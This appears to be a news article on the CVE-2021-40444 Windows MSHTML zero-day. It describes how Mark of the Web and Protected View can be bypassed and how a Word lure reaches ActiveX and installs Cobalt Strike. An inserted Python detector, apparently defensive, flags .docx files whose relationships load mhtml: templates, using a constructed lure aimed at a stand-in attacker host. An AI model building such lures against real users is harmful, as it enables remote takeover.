On September 7, Microsoft issued a security bulletin disclosing a remote code execution vulnerability in the Windows MSHTML (IE) engine, tracked as CVE-2021-40444. Since no patch had been released yet, Microsoft said only that the vulnerability could be exploited through malicious ActiveX controls in Office 365 and Office 2019 to download and install malware on affected Windows 10 hosts.

Researchers subsequently found attacks using malicious Word documents, meaning the vulnerability was already being exploited in the wild as a zero-day.

When Office opens a document, it checks whether the file carries the “Mark of the Web” (MoTW), a tag indicating that it originated from the Internet. If the tag is present, Office opens the document in read-only Protected View unless the user clicks the Enable Editing button.

Word file opened in Protected View

Vulnerability analyst Will Dormann said that the Protected View feature can mitigate the vulnerability. But Dormann added that while Protected View can stop the exploit from triggering, historical data suggests that many users ignore the warning and click the Enable Editing button.

There are also many ways for a file to end up without a MoTW tag. If the file arrives inside a container, MoTW may be lost without the user noticing: for example, when 7-Zip opens a downloaded archive, the extracted files carry no Internet marking. Similarly, if the file is inside an ISO image, Windows users can double-click the ISO to mount it, but Windows does not treat its contents as coming from the Internet.

In addition, Dormann found that the vulnerability could be exploited through RTF files, which do not get Office's Protected View protection.

Microsoft had earlier published steps to prevent ActiveX from running in IE in order to block the known attack activity. But security researcher Kevin Beaumont found a way around Microsoft’s mitigation.

The malicious Word file used in the attack is named ‘A Letter before court 4.docx’ (www.virustotal.com/gui/file/d0…

Because the file was downloaded from the Internet, it carries the Mark of the Web and is opened in Word's Protected View.

Malicious Word document exploiting CVE-2021-40444

Once the user clicks Enable Editing, the exploit uses the MHTML protocol handler to open a side.html file on a remote site, which is loaded as a Word template.

Because the ‘mhtml:’ URL scheme is handled by IE, the browser engine loads the HTML, and its obfuscated JavaScript exploits CVE-2021-40444 by creating a malicious ActiveX control.
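One defender-side check that follows from the chain above: a lure document reaches the mhtml: handler through an external relationship inside the .docx package, so scanning every `*.rels` part for external targets with that scheme catches the lure before Word ever renders it. This is an added example, not code from the article or from any of the researchers it cites; the package it inspects is constructed inline, and the host name is a placeholder.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

# OOXML relationship namespace used by every *.rels part inside a .docx package.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Detection rule (assumption): flag any external relationship whose target uses the
# mhtml: scheme, the loader the article describes for the remote side.html template.
MHTML_RE = re.compile(r"^\s*mhtml:", re.IGNORECASE)


def external_relationships(docx_bytes):
    """Return (rels_part, target) for every relationship with TargetMode="External"."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") == "External":
                    found.append((name, rel.get("Target", "")))
    return found


def mhtml_template_targets(docx_bytes):
    """Targets worth quarantining: external relationships fetched via mhtml:."""
    return [t for _, t in external_relationships(docx_bytes) if MHTML_RE.match(t)]


def build_sample_docx(template_target):
    """Constructed minimal package: only the parts the relationship scan needs."""
    rels = ('<?xml version="1.0" encoding="UTF-8"?>'
            f'<Relationships xmlns="{REL_NS}">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
            'officeDocument/2006/relationships/attachedTemplate" '
            f'Target="{template_target}" TargetMode="External"/>'
            '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("word/document.xml", "<document/>")   # placeholder body
        pkg.writestr("word/settings.xml", "<settings/>")   # placeholder settings
        pkg.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed lure (placeholder host): remote template pulled through mhtml:.
    print(mhtml_template_targets(build_sample_docx("mhtml:http://attacker.example/side.html")))
    # A plain https template link is an ordinary external relationship and is not flagged.
    print(mhtml_template_targets(build_sample_docx("https://intranet.example/corp.dotx")))
```

Run it over the output of a mail gateway or a sandbox's dropped-file directory; a non-empty list means the document should be quarantined rather than delivered.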

Obfuscated JS code in the side.html file

The ActiveX control downloads a ministry.cab file from a remote site, extracts the championship.inf file (actually a DLL), and executes it as a CPL file.

The .inf file executed as a CPL file

Trend Micro says the final payload installs Cobalt Strike, a piece of malware that gives attackers remote access to the device.

Once an attacker has remote access to a victim’s computer, that access can be used to spread across the network, install other malware, steal files, and deploy ransomware.

Given the severity of the vulnerability, the researchers advised users to open attachments only from trusted sources.
